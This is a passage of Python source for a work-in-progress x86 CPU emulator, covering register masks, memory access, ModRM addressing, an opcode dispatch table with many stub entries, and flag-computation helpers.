#RTr64\n        0xFFFFFFFFFFFFFFFF , #RTr64\n        0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF #RTr128\n    ]\n\n    maskRead=[\n        0x00000000000000FF , #RTr8\n        0x000000000000FF00 , #RTrH\n        0x000000000000FFFF , #RTr16\n        0x00000000FFFFFFFF , #RTr32\n        0xFFFFFFFFFFFFFFFF , #RTr64\n        0xFFFFFFFFFFFFFFFF , #RTr64\n        0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF #RTr128\n    ]\n\n    maskL=[\n        mask[RTr128]^mask[RTr8], #RTr8\n        mask[RTr128]^mask[RTrH], #RTrH\n        mask[RTr128]^mask[RTr16],#RTr16\n        mask[RTr128]^mask[RTr32],#RTr32\n        mask[RTr128]^mask[RTr64],#RTr64\n        mask[RTr128]^mask[RTr64],\n        0x0 #RTr128\n    ]\n\n    maskAL=maskRead[RTr8]\n    maskAH=maskRead[RTrH]\n\n    maskMSB=[\n        1<<7, #RTr8\n        1<<7, #RTrH treated as rtr8\n        1<<15,#RTr16\n        1<<31,#RTr32\n        1<<63,#RTr64\n        1<<63,\n        1<<127 #RTr128\n    ]\n\n    maskMSBR=[\n        mask[RTr8] - maskMSB[RTr8],\n        mask[RTr8] - maskMSB[RTr8], # attention\n        mask[RTr16] - maskMSB[RTr16],\n        mask[RTr32] - maskMSB[RTr32],\n        mask[RTr64] - maskMSB[RTr64],\n        mask[RTr64] - maskMSB[RTr64],\n        mask[RTr128]- maskMSB[RTr128]\n    ]\n\n    r8=0\n    rH=1\n    r16=2\n    r32=3\n    r64=4\n    mm=5\n    xmm=6\n    sreg=7\n    eee0=8\n    eee1=9\n\n    bits = [\n        8, #r8\n        8, #rH\n        16, #r16\n        32, #r32\n        64, #r64\n        64, #r64 mm\n        128, #r128 xmm\n        16, #r16 segment register\n        32, #r32 control register\n        32 #r32 debug register\n    ]\n\n    REX = [\n        0x0 , #REX\n        0x1 , #REX.B\n        0x2 , #REX.X\n        0x3 , #REX.XB\n        0x4 , #REX.R\n        0x5 , #REX.RB\n        0x6 , #REX.RX\n        0x7 , #REX.RXB\n        0x8 , #REX.W\n        0x9 , #REX.WB\n        0xA , #REX.WX\n        0xB , #REX.WXB\n        0xC , #REX.WR\n        0xD , #REX.WRB\n        0xE , #REX.WRX\n        0xF #REX.WRXB\n    ]\n\n    REXb=1\n    REXx=2\n    REXr=4\n    REXw=8\n\n    modeREAL = 0 #0 real mode\n    modeIA32 = 1 #1 IA32 mode(protected)\n    modeV8086 = 2 #2 V8086 mode\n    modeIA32e = 3 #3 IA32e mode(64bit)\n\n    stacksize = [\n        1 , # cpu.RTr8\n        1 , # cpu.RTrH\n        2 , # cpu.RTr16\n        4 , # cpu.RTr32\n        8 # cpu.RTr64\n    ]\n\n    LOGIC = 1 #Logical\n    ARITH = 0 #Arithmetic\n\n\n\n    def rReg(self,reg):\n        r = cpu.regp[reg][0]\n        rt= cpu.regp[reg][1]\n        rv = self.register[r] & cpu.maskRead[rt]\n        if rt == cpu.RTrH :\n            rv >>= 
8\n        return rv\n\n\n    def wReg(self,reg,val):\n        r = cpu.regp[reg][0]\n        rt= cpu.regp[reg][1]\n        dmask = cpu.maskRead[rt]\n        maskL = cpu.maskRead[cpu.RTr128] ^ dmask\n        old = self.register[r]\n\n        if rt == cpu.RTrH:\n            val <<= 8\n            #print(hex(val))\n\n        old &= maskL\n        val &= dmask\n        self.register[r] = old | val\n        return self.register[r]\n\n    def disp(self,rt): #displacement\n        r=0\n        c=0\n        bits = cpu.bits[rt]\n        while bits > 0:\n            r += self.readNextMem(self.CS) << (cpu.bits[cpu.RTr8]*c)\n            c += 1\n            bits -= 8\n        return r\n\n\n    def wMem(self,addr,v,rt,seg):\n        c=0\n        bits = int(cpu.bits[rt]>>3) #Division by 8 = bits2bytes\n        while bits > c:\n            bt = v & 0xff #lowest 1 byte\n            self.mem.set(addr + (seg<<4), bt)\n            s='wMem [0x{2:04X}:0x{0:04X}]:0x{1:02X}'.format(addr, bt, seg)\n\n            cpu.dbgp(s)\n            v >>= 8\n            c += 1\n            addr += 1\n\n\n\n    def rMem(self,addr,rt,seg):\n        r=0\n        c=0\n        bits = int(cpu.bits[rt]>>3) #Division by 8 -> bits2bytes\n        while bits > c:\n            bt = self.mem.get(addr + (seg<<4))\n            r += bt << (8*c)\n            s='rMem [0x{2:04X}:0x{0:04X}]:0x{1:02X}'.format(addr, bt, seg)\n            #s='c={0} r={1:X}'.format(c, r)\n            cpu.dbgp(s)\n            c += 1\n            addr += 1\n        return r\n\n\n    def initReg(self):\n        self.wReg(cpu.cs_ , 0)\n        self.wReg(cpu.ds_ , 0)\n        self.wReg(cpu.es_ , 0)\n        self.wReg(cpu.fs_ , 0)\n        self.wReg(cpu.gs_ , 0)\n\n        #self.SS = self.mem.memmax - (self.mem.segment - 1)\n        self.SS = 0\n\n        self.wReg(cpu.ss_ , self.SS)\n\n        #rsp = self.SS + self.mem.segment - 1\n        rsp = self.mem.segment - 1\n        self.wReg(cpu.rsp_ , rsp)\n        #cpu.dbgp('seg:{0} reg:{1}'.format(self.mem.segment , self.rReg(cpu.rsp_)))\n\n\n    def __init__(self,memory):\n        self.eip=0\n        self.eflags=0\n        self.mem=memory\n        self.register = [0 for x in range(0,cpu.r_NREG)]\n\n        self.SS = 0 # stack segment\n        self.CS = 0 # code segment\n        self.DS = 0 # data segment\n        self.ES = 0 # extra segment\n        self.seg = 0 # Overridden segment value\n        self.override = False\n\n\n        self.Mod=0 # ModRM's Mod\n        self.Mrm=0 # ModRM's RM\n        self.rm=0 # rm pointer\n        self.Mro=0 # ModRM's reg/op\n        self.ro=0 # r/o value\n\n\n        self.defaultDB = cpu.RTr16\n        self.DB = cpu.RTr16\n        #16bit = cpu.RTr16\n        #32bit = cpu.RTr32\n        #64bit = cpu.RTr64\n\n\n        self.cpumode = cpu.modeREAL\n        #0 REAL mode\n        #1 IA32 mode(protected)\n        #2 V8086 mode\n        #3 IA32e mode(64bit)\n\n        self.rexw = self.rexr = self.rexx = self.rexb = 0\n\n        self.dstO=self.dstV=0\n        self.srcO=self.srcV=0\n        self.drm=0\n        self.dRT=self.sRT=0\n        # dstO = dest Operand\n        # dstV = value of dest\n        # dRT = resource type of dest\n        # drm = dest type, register or memory (its meaning is the same as Mod)\n        # srcO = src Operand\n        # srcV = value of src\n        # sRT = resource type of src\n\n        self.opStr = ''\n        self._scf = 0 # temporary ShiftCarry\n        self._ccf = 0 # temporary CompletionCarry\n        self.displaytext=''\n\n        self.ftbl16=[\n            # [modbit][rg or rm]\n            # modbit 0b00\n            [\n                lambda : self.rReg(cpu.bx_) + self.rReg(cpu.si_) , #000\n                lambda : self.rReg(cpu.bx_) + self.rReg(cpu.di_) , #001\n                lambda : self.rReg(cpu.bp_) + self.rReg(cpu.si_) , #010\n                lambda : self.rReg(cpu.bp_) + self.rReg(cpu.di_) , #011\n                lambda : self.rReg(cpu.si_) , #100\n                lambda : self.rReg(cpu.di_) , #101\n                lambda : self.disp(cpu.RTr16) , #110\n                lambda : self.rReg(cpu.bx_) #111\n            ],\n\n            # modbit 0b01. 
disp8 series\n [\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.si_) + self.disp(cpu.RTr8) , #000\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.di_) + self.disp(cpu.RTr8) , #001\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.si_) + self.disp(cpu.RTr8) , #010\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.di_) + self.disp(cpu.RTr8) , #011\n lambda : self.rReg(cpu.si_) + self.disp(cpu.RTr8) , #100\n lambda : self.rReg(cpu.di_)+ self.disp(cpu.RTr8) , #101\n lambda : self.rReg(cpu.bp_)+ self.disp(cpu.RTr8) , #110\n lambda : self.rReg(cpu.bx_)+ self.disp(cpu.RTr8) , #111\n ],\n\n # modbit 0b10 disp16 series\n [\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.si_) + self.disp(cpu.RTr16) , #000\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.di_) + self.disp(cpu.RTr16) , #001\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.si_) + self.disp(cpu.RTr16) , #010\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.di_) + self.disp(cpu.RTr16) , #011\n lambda : self.rReg(cpu.si_) + self.disp(cpu.RTr16) , #100\n lambda : self.rReg(cpu.di_) + self.disp(cpu.RTr16) , #101\n lambda : self.rReg(cpu.bp_) + self.disp(cpu.RTr16) , #110\n lambda : self.rReg(cpu.bx_) + self.disp(cpu.RTr16) #111\n ]\n ]\n\n self.rf=[ #mod=0,1,2,3\n lambda d,dR,seg: self.rMem(d,dR,seg) ,\n lambda d,dR,seg : self.rMem(d,dR,seg) ,\n lambda d,dR,seg : self.rMem(d,dR,seg) ,\n lambda d,dR,seg : self.rReg(d)\n ]\n\n self.wf=[ #mod=0,1,2,3\n lambda d,v,dR,seg: self.wMem(d,v,dR,seg),\n lambda d,v,dR,seg: self.wMem(d,v,dR,seg),\n lambda d,v,dR,seg: self.wMem(d,v,dR,seg),\n lambda d,v,dR,seg: self.wReg(d,v)\n ]\n\n self.modstr=[ #mod 0,1,2,3\n lambda x : \"M[{0}]\".format(x),\n lambda x : \"M[{0}]\".format(x),\n lambda x : \"M[{0}]\".format(x),\n lambda x : \"R[{0}]\".format(cpu.regp[x][2])\n ]\n\n self.opcode = [\n lambda x : self.op_add(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#00\n lambda x : self.op_add(\n self.Mrmyrx, self.DB, self.DB),#01\n lambda x : self.op_add(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#02\n lambda x : self.op_add(\n self.Mrxrmy, self.DB, self.DB),#03\n lambda x : self.op_add(\n self.Srxiz, cpu.al_, cpu.RTr8),#04\n lambda x : self.op_add(\n self.Srxiz, cpu.rax_, self.DB),#05\n lambda x : self.op_push(\n self.Srx, cpu.es_, 0),#06 #16bit\n lambda x : self.op_pop(\n self.Srx, cpu.es_, 0),#07 #16bit\n\n\n lambda x : self.op_or(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#08\n lambda x : self.op_or(\n self.Mrmyrx, self.DB, self.DB),#09\n lambda x : self.op_or(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#0A\n lambda x : self.op_or(\n self.Mrxrmy, self.DB, self.DB),#0B\n lambda x : self.op_or(\n self.Srxiz, cpu.al_, cpu.RTr8),#0C\n lambda x : self.op_or(\n self.Srxiz, cpu.rax_, self.DB),#0D\n lambda x : self.op_push(\n self.Srx, cpu.cs_, 0),#0E #16bit\n lambda x : self.op_(x),\n #self.Srx, cpu.es_, 0),#0F\n\n lambda x : self.op_adc(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#10\n lambda x : self.op_adc(\n self.Mrmyrx, self.DB, self.DB),#11\n lambda x : self.op_adc(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#12\n lambda x : self.op_adc(\n self.Mrxrmy, self.DB, self.DB),#13\n lambda x : self.op_adc(\n self.Srxiz, cpu.al_, cpu.RTr8),#14\n lambda x : self.op_adc(\n self.Srxiz, cpu.rax_, self.DB),#15\n lambda x : self.op_push(\n self.Srx, cpu.ss_, 0),#16 #16bit\n lambda x : self.op_pop(\n self.Srx, cpu.ss_, 0),#17 #16bit\n\n lambda x : self.op_sbb(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#18\n lambda x : self.op_sbb(\n self.Mrmyrx, self.DB, self.DB),#19\n lambda x : self.op_sbb(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#1A\n lambda x : self.op_sbb(\n self.Mrxrmy, self.DB, self.DB),#1B\n lambda x 
: self.op_sbb(\n                self.Srxiz, cpu.al_, cpu.RTr8),#1C\n            lambda x : self.op_sbb(\n                self.Srxiz, cpu.rax_, self.DB),#1D\n            lambda x : self.op_push(\n                self.Srx, cpu.ds_, 0),#1E #16bit\n            lambda x : self.op_pop(\n                self.Srx, cpu.ds_, 0),#1F #16bit\n\n            lambda x : self.op_and(\n                self.Mrmyrx, cpu.RTr8, cpu.RTr8),#20\n            lambda x : self.op_and(\n                self.Mrmyrx, self.DB, self.DB),#21\n            lambda x : self.op_and(\n                self.Mrxrmy, cpu.RTr8, cpu.RTr8),#22\n            lambda x : self.op_and(\n                self.Mrxrmy, self.DB, self.DB),#23\n            lambda x : self.op_and(\n                self.Srxiz, cpu.al_, cpu.RTr8),#24\n            lambda x : self.op_and(\n                self.Srxiz, cpu.rax_, self.DB),#25\n            lambda x : self.op_segoverride(\n                self.Srx, cpu.es_, 0),#26 #16bit\n            lambda x : self.op_daa(\n                self.Srx, cpu.al_, 0),#27 #16bit\n\n            lambda x : self.op_sub(\n                self.Mrmyrx, cpu.RTr8, cpu.RTr8),#28\n            lambda x : self.op_sub(\n                self.Mrmyrx, self.DB, self.DB),#29\n            lambda x : self.op_sub(\n                self.Mrxrmy, cpu.RTr8, cpu.RTr8),#2A\n            lambda x : self.op_sub(\n                self.Mrxrmy, self.DB, self.DB),#2B\n            lambda x : self.op_sub(\n                self.Srxiz, cpu.al_, cpu.RTr8),#2C\n            lambda x : self.op_sub(\n                self.Srxiz, cpu.rax_, self.DB),#2D\n            lambda x : self.op_segoverride(\n                self.Srx, cpu.cs_,0),#2E #16bit\n            lambda x : self.op_das(\n                self.Srx, cpu.al_, 0),#2F #16bit\n\n            lambda x : self.op_xor(\n                self.Mrmyrx, cpu.RTr8, cpu.RTr8),#30\n            lambda x : self.op_xor(\n                self.Mrmyrx, self.DB, self.DB),#31\n            lambda x : self.op_xor(\n                self.Mrxrmy, cpu.RTr8, cpu.RTr8),#32\n            lambda x : self.op_xor(\n                self.Mrxrmy, self.DB, self.DB),#33\n            lambda x : self.op_xor(\n                self.Srxiz, cpu.al_, cpu.RTr8),#34\n            lambda x : self.op_xor(\n                self.Srxiz, cpu.rax_, self.DB),#35\n            lambda x : self.op_segoverride(\n                self.Srx, cpu.ss_, 0),#36 #16bit\n            lambda x : self.op_aaa(\n                self.Srxrx, cpu.al_, cpu.ah_),#37\n\n\n            lambda x : self.op_cmp(\n                self.Mrmyrx, cpu.RTr8, cpu.RTr8),#38\n            lambda x : self.op_cmp(\n                self.Mrmyrx, self.DB, self.DB),#39\n            lambda x : self.op_cmp(\n                self.Mrxrmy, cpu.RTr8, cpu.RTr8),#3A\n            lambda x : self.op_cmp(\n                self.Mrxrmy, self.DB, self.DB),#3B\n            lambda x : self.op_cmp(\n                self.Srxiz, cpu.al_, cpu.RTr8),#3C\n            lambda x : self.op_cmp(\n                self.Srxiz, cpu.rax_, self.DB),#3D\n            lambda x : self.op_segoverride(\n                self.Srx, cpu.ds_, 0),#3E\n            lambda x : self.op_aas(\n                self.Srxrx, cpu.al_, cpu.ah_),#3F\n\n            lambda x : self.op_inc(),#40\n            lambda x : self.op_inc(),#41\n            lambda x : self.op_inc(),#42\n            lambda x : self.op_inc(),#43\n            lambda x : self.op_inc(),#44\n            lambda x : self.op_inc(),#45\n            lambda x : self.op_inc(),#46\n            lambda x : self.op_inc(),#47\n            lambda x : self.op_dec(),#48\n            lambda x : self.op_dec(),#49\n            lambda x : self.op_dec(),#4A\n            lambda x : self.op_dec(),#4B\n            lambda x : self.op_dec(),#4C\n            lambda x : self.op_dec(),#4D\n            lambda x : self.op_dec(),#4E\n            lambda x : self.op_dec(),#4F\n\n            lambda x : self.op_push(\n                self.SSrx, cpu.r_rax, self.DB),#50\n            lambda x : self.op_push(\n                self.SSrx, cpu.r_rcx, self.DB),#51\n            lambda x : self.op_push(\n                self.SSrx, cpu.r_rdx, self.DB),#52\n            lambda x : self.op_push(\n                self.SSrx, cpu.r_rbx, self.DB),#53\n            lambda x : self.op_push(\n                self.SSrx, cpu.r_rsp, self.DB),#54\n            lambda x : self.op_push(\n                self.SSrx, cpu.r_rbp, self.DB),#55\n            lambda x : self.op_push(\n                self.SSrx, cpu.r_rsi, self.DB),#56\n            lambda x : self.op_push(\n                self.SSrx, cpu.r_rdi, self.DB),#57\n\n            lambda x : self.op_pop(\n                self.SSrx, cpu.r_rax, self.DB),#58\n            lambda x : self.op_pop(\n                self.SSrx, cpu.r_rcx, self.DB),#59\n            lambda x : self.op_pop(\n                self.SSrx, cpu.r_rdx, self.DB),#5A\n            lambda x : self.op_pop(\n                self.SSrx, cpu.r_rbx, self.DB),#5B\n            
lambda x : self.op_pop(\n                self.SSrx, cpu.r_rsp, self.DB),#5C\n            lambda x : self.op_pop(\n                self.SSrx, cpu.r_rbp, self.DB),#5D\n            lambda x : self.op_pop(\n                self.SSrx, cpu.r_rsi, self.DB),#5E\n            lambda x : self.op_pop(\n                self.SSrx, cpu.r_rdi, self.DB),#5F\n\n            lambda x : self.op_pusha(\n                self.noArgs,0,0),#60\n            lambda x : self.op_popa(\n                self.noArgs,0,0),#61\n            lambda x : self.op_bound(\n                self.Mrxrmy, self.DB, self.DB),#62\n            lambda x : self.op_arpl(\n                self.Mrmyrx, cpu.RTr16, cpu.RTr16),#63\n            lambda x : self.op_segoverride(\n                self.Srx, cpu.fs_, 0),#64\n            lambda x : self.op_segoverride(\n                self.Srx, cpu.gs_, 0),#65\n            \n            lambda x : self.prefix(),#66\n            lambda x : self.prefix(),#67\n            \n            lambda x : self.op_push(\n                self.Siz, self.DB,0),#68\n            \n            lambda x : self.op_imul(\n                self.Mrmy, self.DB, self.DB),#69\n            \n            lambda x : self.op_push(\n                self.Siz, cpu.RTr8, 0),#6A\n            \n            lambda x : self.op_imul(\n                self.Mrmy, self.DB, cpu.RTr8),#6B\n            \n            lambda x : self.op_ins(\n                self.Sarg, cpu.RTr8, 0),#6C\n            lambda x : self.op_ins(\n                self.Sarg, self.DB, 0),#6D\n            \n            lambda x : self.op_outs(\n                self.Sarg, cpu.RTr8, 0),#6E\n            lambda x : self.op_outs(\n                self.Sarg, self.DB, 0),#6F\n            \n            lambda x : self.op_jo(\n                self.Siz, cpu.RTr8, True),#70 jo\n            lambda x : self.op_jo(\n                self.Siz, cpu.RTr8, False),#71 jno\n            lambda x : self.op_jc(\n                self.Siz, cpu.RTr8, True),#72 jc\n            lambda x : self.op_jc(\n                self.Siz, cpu.RTr8, False),#73 jnc\n            lambda x : self.op_jz(\n                self.Siz, cpu.RTr8, True),#74 jz\n            lambda x : self.op_jz(\n                self.Siz, cpu.RTr8, False),#75 jnz\n            lambda x : self.op_jbe(\n                self.Siz, cpu.RTr8, True),#76 jbe\n            lambda x : self.op_jbe(\n                self.Siz, cpu.RTr8, False),#77 jnbe\n            lambda x : self.op_js(\n                self.Siz, cpu.RTr8, True),#78 js\n            lambda x : self.op_js(\n                self.Siz, cpu.RTr8, False),#79 jns\n            lambda x : self.op_jp(\n                self.Siz, cpu.RTr8, True),#7A jp\n            lambda x : self.op_jp(\n                self.Siz, cpu.RTr8, False),#7B jnp\n            lambda x : self.op_jl(\n                self.Siz, cpu.RTr8, True),#7C jl\n            lambda x : self.op_jl(\n                self.Siz, cpu.RTr8, False),#7D jnl\n            lambda x : self.op_jle(\n                self.Siz, cpu.RTr8, True),#7E jle\n            lambda x : self.op_jle(\n                self.Siz, cpu.RTr8, False),#7F jnle\n            \n            lambda x : self.op_8x(\n                self.Mrmyiz, cpu.RTr8, cpu.RTr8),#80\n            lambda x : self.op_8x(\n                self.Mrmyiz, self.DB, self.DB),#81\n            lambda x : self.op_8x(\n                self.Mrmyiz, cpu.RTr8, cpu.RTr8),#82\n            lambda x : self.op_8x(\n                self.Mrmyiz, self.DB, cpu.RTr8),#83\n            \n            lambda x : self.op_test(\n                self.Mrmyrx, cpu.RTr8, cpu.RTr8),#84\n            lambda x : self.op_test(\n                self.Mrmyrx, self.DB, self.DB),#85\n            \n            lambda x : self.op_xchg(\n                self.Mrxrmy, cpu.RTr8, cpu.RTr8),#86\n            lambda x : self.op_xchg(\n                self.Mrmyrx, self.DB, self.DB),#87\n            \n            lambda x : self.op_mov(\n                self.Mrmyrx, cpu.RTr8, cpu.RTr8),#88\n            lambda x : self.op_mov(\n                self.Mrmyrx, self.DB, self.DB),#89\n            lambda x : self.op_mov(\n                self.Mrxrmy, cpu.RTr8, cpu.RTr8),#8A\n            lambda x : self.op_mov(\n                self.Mrxrmy, self.DB, self.DB),#8B\n            \n            lambda x : self.op_mov(\n                self.Mrmyrx, self.DB, cpu.sreg),#8C\n            \n            lambda x : self.op_lea(\n                self.Mrxrmy, self.DB, self.DB),#8D\n            \n            lambda x : self.op_mov(\n                self.Mrxrmy, cpu.sreg, cpu.RTr16),#8E\n            \n            lambda x : self.op_pop(\n                self.Mrmy, self.DB, self.DB),#8F\n            \n            lambda x : self.op_ ,#90\n            lambda x : self.op_ ,#91\n            lambda x : self.op_ ,#92\n            lambda x : self.op_ ,#93\n            lambda x : self.op_ ,#94\n            lambda x : self.op_ ,#95\n            lambda x : self.op_ ,#96\n            lambda x : self.op_ ,#97\n            lambda x : self.op_ ,#98\n            lambda x : self.op_ ,#99\n            lambda x : self.op_ ,#9A\n            lambda x 
,#9B\n lambda x : self.op_ ,#9C\n lambda x : self.op_ ,#9D\n lambda x : self.op_ ,#9E\n lambda x : self.op_ ,#9F\n lambda x : self.op_ ,#A0\n lambda x : self.op_ ,#A1\n lambda x : self.op_ ,#A2\n lambda x : self.op_ ,#A3\n lambda x : self.op_ ,#A4\n lambda x : self.op_ ,#A5\n lambda x : self.op_ ,#A6\n lambda x : self.op_ ,#A7\n lambda x : self.op_ ,#A8\n lambda x : self.op_ ,#A9\n lambda x : self.op_ ,#AA\n lambda x : self.op_ ,#AB\n lambda x : self.op_ ,#AC\n lambda x : self.op_ ,#AD\n lambda x : self.op_ ,#AE\n lambda x : self.op_ ,#AF\n \n lambda x : self.op_mov(\n \tself.Srxiz, cpu.al_, cpu.RTr8),#B0\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.cl_, cpu.RTr8) ,#B1\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.dl_, cpu.RTr8) ,#B2\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.bl_, cpu.RTr8) ,#B3\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.ah_, cpu.RTr8) ,#B4\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.ch_, cpu.RTr8) ,#B5\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.dh_, cpu.RTr8) ,#B6\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.bh_, cpu.RTr8) ,#B7\n \n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rax][self.DB], self.DB),#B8\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rcx][self.DB], self.DB) ,#B9\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rdx][self.DB], self.DB) ,#BA\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rbx][self.DB], self.DB) ,#BB\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rsp][self.DB], self.DB) ,#BC\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rbp][self.DB], self.DB) ,#BD\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rsi][self.DB], self.DB) ,#BE\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rdi][self.DB], self.DB) ,#BF\n \t\n lambda x : self.op_ ,#C0\n lambda x : self.op_ ,#C1\n lambda x : self.op_ ,#C2\n lambda x : self.op_ ,#C3\n lambda x : self.op_ ,#C4\n lambda x : self.op_ ,#C5\n lambda x : self.op_ ,#C6\n lambda x : self.op_ ,#C7\n lambda x : self.op_ ,#C8\n lambda x : self.op_ ,#C9\n lambda x : self.op_ ,#CA\n lambda x : self.op_ ,#CB\n lambda x : self.op_ ,#CC\n lambda x : self.intImm8() ,#CD\n lambda x : self.op_ ,#CE\n lambda x : self.op_ ,#CF\n lambda x : self.op_ ,#D0\n lambda x : self.op_ ,#D1\n lambda x : self.op_ ,#D2\n lambda x : self.op_ ,#D3\n lambda x : self.op_ ,#D4\n lambda x : self.op_ ,#D5\n lambda x : self.op_ ,#D6\n lambda x : self.op_ ,#D7\n lambda x : self.op_ ,#D8\n lambda x : self.op_ ,#D9\n lambda x : self.op_ ,#DA\n lambda x : self.op_ ,#DB\n lambda x : self.op_ ,#DC\n lambda x : self.op_ ,#DD\n lambda x : self.op_ ,#DE\n lambda x : self.op_ ,#DF\n lambda x : self.op_ ,#E0\n lambda x : self.op_ ,#E1\n lambda x : self.op_ ,#E2\n lambda x : self.op_ ,#E3\n lambda x : self.op_ ,#E4\n lambda x : self.op_ ,#E5\n lambda x : self.op_ ,#E6\n lambda x : self.op_ ,#E7\n lambda x : self.op_ ,#E8\n lambda x : self.op_ ,#E9\n lambda x : self.op_ ,#EA\n lambda x : self.op_jmpRel8() ,#EB\n lambda x : self.op_ ,#EC\n lambda x : self.op_ ,#ED\n lambda x : self.op_ ,#EE\n lambda x : self.op_ ,#EF\n lambda x : self.op_ ,#F0\n lambda x : self.op_ ,#F1\n lambda x : self.op_ ,#F2\n lambda x : self.op_ ,#F3\n lambda x : self.op_ ,#F4\n lambda x : self.op_ ,#F5\n lambda x : self.op_ ,#F6\n lambda x : self.op_ ,#F7\n lambda x : self.op_ ,#F8\n lambda x : self.op_ ,#F9\n lambda x : self.op_ ,#FA\n lambda x : self.op_ ,#FB\n lambda x : self.op_ ,#FC\n lambda x 
: self.op_ ,#FD\n            lambda x : self.op_ ,#FE\n            lambda x : self.op_ ,#FF\n            \n        ]\n\n        self.initReg()\n\n\n    def tocomp(self,r1,rt):\n        t = (~r1) + 1\n        if r1 == 0 or t > cpu.mask[rt]:\n            self._ccf = 1\n        else:\n            self._ccf = 0\n        #cpu.dbgp('tocomp: {0} -> {1}'.format(r1,t&cpu.mask[rt]))\n        return t & cpu.mask[rt]\n\n\n    def tocomp2(self,ru,rl,rt):\n        rl2 = self.tocomp(rl,rt)\n        if self._ccf == 1:\n            ru2 = self.tocomp(ru,rt)\n        else:\n            ru2 = (~ru) & cpu.mask[rt]\n\n        #s = 'tocomp2: u:l={0}:{1}={8}:{9}=val:{2}|{3} -> ru:rl={4}:{5}={10}:{11}=val:{6}|{7}'.format(ru, rl, (ru<<cpu.bits[rt])|rl, self._ccf, ru2, rl2, (ru2<<cpu.bits[rt])|rl2, self._ccf, bin(ru), bin(rl), bin(ru2), bin(rl2))\n        #cpu.dbgp(s)\n        return ru2,rl2\n\n\n    def chkOF(v1,v2,v3,rt):\n        '''\n        v1 & v2=msb 1 & v3=msb 0 ->T\n        v1 & v2=msb 0 & v3=msb 1 ->T\n        '''\n        c1 = cpu.chkMSB(v1,rt)\n        c2 = cpu.chkMSB(v2,rt)\n        c3 = cpu.chkMSB(v3,rt)\n        s='chkOF: op1MSB[{0}] op2MSB[{1}] resultMSB[{2}] ->'.format(c1,c2,c3)\n        if ( c1 and c2 and (not c3)) or ( (not c1) and (not c2) and c3 ):\n            s=s+'True'\n            cpu.dbgp(s)\n            return True\n        else:\n            s=s+'False'\n            cpu.dbgp(s)\n            return False\n\n\n    def chkCF(val):\n        s='chkCF:{0}'.format(val)\n        cpu.dbgp(s)\n        return True if val == 1 else False\n\n    def chkZF(val,rt):\n        '''\n        val is all 0 -> T\n        '''\n        mask = cpu.mask[rt]\n        v = val & mask\n        retval = True if v == 0 else False\n        s='chkZF:{0:b}({0}) & mask({1:b})({1}) -> {2:b}({2}) ZF:{3}'.format(val,mask,v,retval)\n        cpu.dbgp(s)\n        return retval\n\n\n    def chkMSB(val,rt):\n        mask = cpu.maskMSB[rt]\n        v = val & mask\n        retval = True if v >0 else False\n        s='chkMSB/SF[mask({2:0b})({2})]:{0:b}({0}) -> MSB:{1:b}({1}) SF:{3}'.format(val , v, mask, retval)\n        cpu.dbgp(s)\n        return retval\n\n\n    def chkPF(val,rt):\n        v = val & 0x0F # low nibble\n        # even-parity nibbles: 0,3,5,6,9,10,12,15\n        if v == 0b0011 or v == 0b0101 or v == 0b0110 or v == 0b1001 or v == 0b1010 or v == 0b1100 or v == 0x00 or v == 0b1111:\n            retval = True\n        else:\n            retval = False\n        s='chkPF:{0:b}({0}) -> mask(1111)(15):{1:b}({1}) PF:{2}'.format(val , v, retval)\n        cpu.dbgp(s)\n        return retval\n\n\n\n    def chkAF(v1,v2,v3):\n        '''\n        example\n        5b 5b 5b\n        00100 + 01000 = 01100 0 0 0 nc\n        01000 + 01000 = 10000 0 0 1 c\n        10000 + 01000 = 11000 1 0 1 nc\n        11000 + 01000 =100000 1 0 0 c\n        01000 + 10000 = 11000 0 1 1 nc\n        10000 + 10000 =100000 1 1 0 nc\n        11000 + 10000 =101000 1 1 0 nc\n        01000 + 11000 =100000 0 1 0 c\n        10000 + 11000 =101000 1 1 0 nc\n        11000 + 11000 =110000 1 1 1 c\n\n        5bit's pattern\n        s s d\n        0 0 = 0 n no carried\n        0 0 = 1 c carried\n        0 1 = 0 c carried\n        0 1 = 1 n no carried\n        1 0 = 0 c carried\n        1 0 = 1 n no carried\n        1 1 = 0 n no carried\n        1 1 = 1 c carried\n\n        True's pattern (carried)\n        v1+v2=0 and v3=1\n        v1+v2=1 and v3=0\n        v1+v2=2 and v3=1\n        '''\n        v12 = (v1 & 0x10) + (v2 & 0x10)\n        v33 = v3 & 0x10\n        if (v12 == 0 and v33 == 0x10) or (v12 == 0x10 and v33 == 0) or (v12 == 0x20 and v33 == 0x10):\n            retval = True\n        else:\n            retval = False\n        